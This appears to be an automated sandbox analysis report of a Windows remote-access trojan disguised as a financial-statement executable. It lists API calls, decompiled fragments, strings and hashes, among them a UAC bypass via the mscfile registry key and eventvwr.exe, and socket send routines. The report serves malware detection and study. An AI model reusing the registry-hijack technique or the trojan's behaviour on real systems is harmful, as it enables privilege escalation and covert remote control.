                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                        • send.WS2_32(?,00000000), ref: 004024BB
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                        • send.WS2_32(?,00000000), ref: 004024FF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                        • String ID: [DataStart]
                                        • API String ID: 1403384299-3852763199
                                        • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                        • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040122D, Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                        • closesocket.WS2_32 ref: 00401266
                                        • ExitThread.KERNEL32 ref: 00401274
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                        • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                        • String ID:
                                        • API String ID: 3470141593-0
                                        • Opcode ID: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                        • Opcode Fuzzy Hash: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402637, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 94timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00402637(void* __ecx, intOrPtr _a4) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				char _v56;
				char* _t42;
				char* _t43;
				char* _t50;
				char* _t51;
				void* _t68;
				void* _t69;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x38)) == 0) {
					return 0;
				}
				if( *0x41bcac != 0) {
					if( *((char*)(__ecx + 0x44)) != 0) {
						GetLocalTime( &_v24);
						_t50 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t51 =  &_v40;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
						printf(_t51);
						_t69 = _t69 + 0x24;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
					}
					_t16 = _t68 + 0x3c; // 0x0
					if( *_t16 != _a4) {
						GetLocalTime( &_v24);
						_t42 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t43 =  &_v56;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
						printf(_t43);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
				return 1;
			}













                                        0x0040263e
                                        0x00402644
                                        0x00000000
                                        0x00402749
                                        0x00402653
                                        0x00402669
                                        0x0040266f
                                        0x0040268b
                                        0x00402699
                                        0x004026a0
                                        0x004026a4
                                        0x004026ae
                                        0x004026b5
                                        0x004026b7
                                        0x004026bd
                                        0x004026c6
                                        0x004026cc
                                        0x004026cc
                                        0x004026d0
                                        0x004026d6
                                        0x004026dc
                                        0x004026f8
                                        0x00402706
                                        0x0040270d
                                        0x00402711
                                        0x0040271b
                                        0x00402722
                                        0x0040272a
                                        0x00402733
                                        0x00402733
                                        0x004026d6
                                        0x0040273c
                                        0x00402740
                                        0x00000000

                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                        • printf.MSVCRT ref: 004026B5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                        • printf.MSVCRT ref: 00402722
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                        • API String ID: 1710008465-2297210016
                                        • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                        • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004030EC, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,?), ref: 0040318F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                        • exit.MSVCRT ref: 004031D8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                        Strings
                                        • origmsc, xrefs: 00403160
                                        • mscfile\shell\open\command, xrefs: 0040311C
                                        • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                        • open, xrefs: 004031C6
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 0040318A
                                        • eventvwr.exe, xrefs: 004031A6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                        • String ID: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                        • API String ID: 2587331422-3334443473
                                        • Opcode ID: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                        • Opcode Fuzzy Hash: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409D3C, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.ADVAPI32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.ADVAPI32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                        • Sleep.KERNEL32(00000BB8), ref: 00409DFA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                        • exit.MSVCRT ref: 00409E77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                        • String ID: 2.7.2 Pro$override$pth_unenc
                                        • API String ID: 3602623569-3893205188
                                        • Opcode ID: 8228ca575d73922a3ee67361cb50e71d0985c32122b88b91f319b4381fe8a494
                                        • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                        • Opcode Fuzzy Hash: 8228ca575d73922a3ee67361cb50e71d0985c32122b88b91f319b4381fe8a494
                                        • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D64E, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 102COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • open, xrefs: 0040D70B
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 0040D752
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                        • String ID: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$open
                                        • API String ID: 2112629403-882194827
                                        • Opcode ID: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                        • Opcode Fuzzy Hash: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D9A0, Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D9AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                          • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
